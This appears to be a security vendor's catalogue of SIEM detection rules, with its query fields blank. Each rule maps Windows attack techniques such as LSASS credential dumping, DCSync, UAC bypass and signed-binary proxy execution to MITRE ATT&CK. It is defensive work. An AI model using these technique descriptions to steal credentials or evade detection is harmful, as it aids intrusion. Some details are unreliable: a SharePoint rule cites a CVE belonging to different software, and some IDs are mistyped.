Trigger condition: The execution of the +s option of the attrib command is detected to designate scripts or executable files in suspicious locations as system files, hiding them from users and making them difficult to detect or remove. attrib.exe is a Windows command-line utility that allows users to adjust file or folder attributes such as read-only, hidden and system.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hide Artifacts, Hidden Files and Directories
ATT&CK ID: T1564, T1564.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Bypass User Account Control using Registry
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Unsigned Image Loaded Into LSASS Process
Trigger condition: Loading unsigned images like DLL or EXE into the LSASS process.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Usage of Sysinternals Tools Detected
Trigger condition: Usage of Sysinternals tools due to the addition of accepteula key to a registry.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft SharePoint Remote Code Execution Detected
Trigger condition: The execution of a remote code in Microsoft SharePoint (CVE-2019-19781).
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS/IPS, Web server
Query:
LP_DenyAllWAF SQL Injection Attack
Trigger condition: DenyALLWAF detects SQL injection attack.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: DenyAll WAF
Query:
LP_Malicious use of Scriptrunner Detected
Trigger condition: The malicious use of Scriptrunner.exe is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Javascript conversion to executable Detected
Trigger condition: A windows executable jsc.exe is used to convert javascript files to craft malicious executables.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: TT1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Gpscript Detected
Trigger condition: A group policy script gpscript.exe is used to execute logon or startup scripts configured in Group Policy.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Execution via Desktop Setting Control Panel
Trigger condition: A windows internal binary rundll32 with desk.cpl is used to execute spoof binary with “.cpl” extension.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Xwizard DLL Side Loading Detected
Trigger condition: The use of xwizard binary from the non-default directory is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_DLL Side Loading Via Microsoft Defender
Trigger condition: An execution of mpcmdrun binary from non default path is detected.
ATT&CK Category: Persistence, Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_ZIP File Creation or Extraction via Printer Migration CLI Tool
Trigger condition: The creation or extraction of .zip file via printbrm utility is detected.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: Ingress Tool Transfer, NTFS File Attributes
ATT&CK ID: T1105, T1564.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Credentials Capture via Rpcping Detected
Trigger condition: The creation of Remote Procedure Call (RPC) via Rpcping binary is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_C-Sharp Code Compilation Using Ilasm Detected
Trigger condition: C# code is either compiled into executables or into DLL using Ilasm utility.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: T1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Dump via Resource Leak Diagnostic Tool
Trigger condition: A process dump is detected using a Microsoft Windows native tool rdrleakdiag.exe.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DLL execution via Register-Cimprovider
Trigger condition: A dll file load/execution is detected using a Microsoft Windows native tool Register-Cimprovider.exe.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow
ATT&CK ID: TT1574
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Accessibility Features-Registry
Trigger condition: An adversary establish persistence and/or elevates privileges by executing malicious content, replacing accessibility feature binaries, pointers, or references to these binaries in the registry.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Active Directory DLLs Loaded By Office Applications
Trigger condition: This alert is triggered whenever it detects Kerberos DLL or DSParse DLL are loaded by Office Products such as winword, powerpoint, excel, outlook.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DCSync detected
Trigger condition: Misuse of Active Directory Replication Service (ADRS) from a non-machine account to request credentials or DC Sync by creating a new SPN.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, DCSync
ATT&CK ID: T1003, T1003.006
Minimum Log Source Requirement: Windows
Query:
LP_Active Directory Replication User Backdoor
Trigger condition: This alert is triggered whenever it detects modification of the security descriptor of a domain object to grant all the active directory replication permissions to any user. The security descriptor contains the access control lists (ACLs) of the resource. With directory replication permission adversaries can perform DCsync attack.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File and Directory Permissions Modification, Windows File and Directory Permissions Modification, DCSync
ATT&CK ID: T1222, T1222.001, T1003.006
Minimum Log Source Requirement: Windows
Query:
LP_AD Object WriteDAC Access Detected
Trigger condition: WRITE_DAC, which can modify the discretionary access-control list (DACL) in the object security descriptor, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File and Directory Permissions Modification
ATT&CK ID: T1222
Minimum Log Source Requirement: Windows
Query:
LP_AD Privileged Users or Groups Reconnaissance Detected
Trigger condition: priv users or groups recon based on 4661 event ID and privileged users or groups SIDs are detected. The object names must be; domain admin, KDC service account, admin account, enterprise admin, group policy creators and owners, backup operator, or remote desktop users.
ATT&CK Category: Discovery
ATT&CK Tag: Account Discovery, Local Account, Domain Account
ATT&CK ID: T1087,T1087.001,T1087.002
Minimum Log Source Requirement: Windows
Query:
LP_Addition of SID History to Active Directory Object
Trigger condition: Addition of SID History to Active Directory Object is detected. An attacker can use the SID history attribute to gain additional privileges.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Access Token Manipulation, SID-History Injection
ATT&CK ID: T1134,T1134.005
Minimum Log Source Requirement: Windows
Query:
LP_Admin User Remote Logon Detected
Trigger condition: Successful remote login by the administrator depending on the internal pattern is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Adwind RAT JRAT Detected
Trigger condition: The applications like javaw.exe, cscript in the AppData folder, or set values of Windows Run* register used by Adwind or JRAT are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Visual Basic, JavaScript/JScript, Windows Command Shell, PowerShell
ATT&CK ID: T1059, T1059.001, T1059.003, T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Apache Struts 2 Remote Code Execution Detected
Trigger condition: A remote code execution vulnerability (CVE-2017-5638) in Apache Struts 2 is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: ApacheTomcat
Query:
LP_AppCert DLLs Detected
Trigger condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, AppCert DLLs
ATT&CK ID: T1546, T1546.009
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Whitelisting Bypass via Dnx Detected
Trigger condition: Execution of Dnx binary with ConsoleApp commandline argument is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Compile After Delivery, Signed Binary Proxy Execution
ATT&CK ID: T1027.004, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Authentication Package Detected
Trigger Condition: The LSA process loaded by services other than lssac, svchos, msiexec and services is detected. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at the system start. Adversaries may abuse authentication packages to execute DLLs when the system boots.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Authentication Package, Security Support Provider
ATT&CK ID: T1547.002, T1547.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Bloodhound and Sharphound Hack Tool Detected
Trigger Condition: This alert is triggered whenever it detects usage of Bloodhound and Sharphound hack tools through command line or process. BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment. SharpHound is the official data collector for BloodHound. Adversaries can use these tools to perform reconnaissance and identify vulnerable endpoint.
ATT&CK Category: Discovery
ATT&CK Tag: Account Discovery
ATT&CK ID: T1087
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LSASS Access from Non System Account Detected
Trigger Condition: This alert is triggered whenever it detects potential mimikatz-like tools accessing LSASS from non system account. Local Security Authority Subsystem Service (Lsass.exe) is the process on an Active Directory domain controller. It’s responsible for providing Active Directory database lookups, authentication, and replication. The credential data inside LSASS may include Kerberos tickets, NTLM password hashes, LM password hashes, and even clear-text passwords (to support WDigest and SSP authentication among others. Adversaries look to get access to the credential data and do so by finding a way to access the contents of memory of the LSASS process. Looking for non-system accounts getting a handle on and accessing lsass is crucial to detect lsass dumping attempts.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_LSASS Memory Dump Detected
Trigger Condition: Process access to lsass.exe with elevated access rights. Adversaries can use this technique to gain access to lsass process memory and dump credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_LSASS Memory Dump File Creation
Trigger Condition: LSASS memory dump creation using operating systems utilities is detected. Procdump uses process name in the output file if no name is specified.
ATT&CK Category: Credential Access
ATT&CK Tag: Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_LSSAS Memory Dump with MiniDumpWriteDump API Detected
Trigger condition: This alert is triggered whenever it detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealthy way. Tools like ProcessHacker and some attacker tradecraft use this API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker’s machine.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: Masquerading, OS Credential Dumping, LSASS Memory
ATT&CK ID: T1036, T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Macro file Creation Detected
Trigger Condition: This alert is triggered whenever macro file creation is detected. A macro is a script or program that automates tasks within applications like Microsoft Office through VBScripting. It is essential to detect the creation of macro files in the system as Adversaries often use macro-enabled files to deliver malware, exploit vulnerabilities, or trick users into enabling malicious code.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Visual Basic
ATT&CK ID: T1059, T1059.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected
Trigger Condition: When base64 encoded strings are used in hidden malicious Command and Scripting Interpreter, PowerShell command lines. Adversaries hides their activities by encoding commands to bypass detection with this technique.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious File Execution Detected
Trigger Condition: Execution of a suspicious file by wscript and cscript.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malware Shellcode in Verclsid Target Process
Trigger Condition: A process accessing verclsid.exe that injects shellcode from a Microsoft Office application or VBA macro is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Verclsid
ATT&CK ID: T1055, T1218.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RSA SecurID Passcode Reuse
Trigger Condition: This alert is triggered when passcode reuse event occurs.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: RSA Secure ID
LP_Suspicious Atbroker Execution Detected
Trigger Condition: This alert is triggered whenever Atbroker executing non-default Assistive Technology applications is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: System Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious MMC Process Pattern
Trigger Condition: This alert is triggered when .msc (Microsoft Management Console) files are executed from outside the default Windows path: C:WindowsSystem32.
ATT&CK Category: Defense Evasion
ATT&CK Tag: MMC
ATT&CK ID: T1218.014
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows unBlock Inheritance on OU or Domain
Trigger Condition: This alert is triggered whenever inheritance is set to unblock on OU or domain.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Group Policy Modification
ATT&CK ID: T1484.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Application Whitelisting Bypass with DLL load via ODBC
Trigger Condition: This alert gets triggered when the odbcconf executable loads DLLs.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Odbcconf
ATT&CK ID: T1218.008
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Possible UAC Bypass via System Configuration Utility
Trigger Condition: This alert gets triggered when msconfig token modification is used to possibly bypass UAC.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Bypass User Account Control
ATT&CK ID: T1548.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
Last updated
Was this helpful?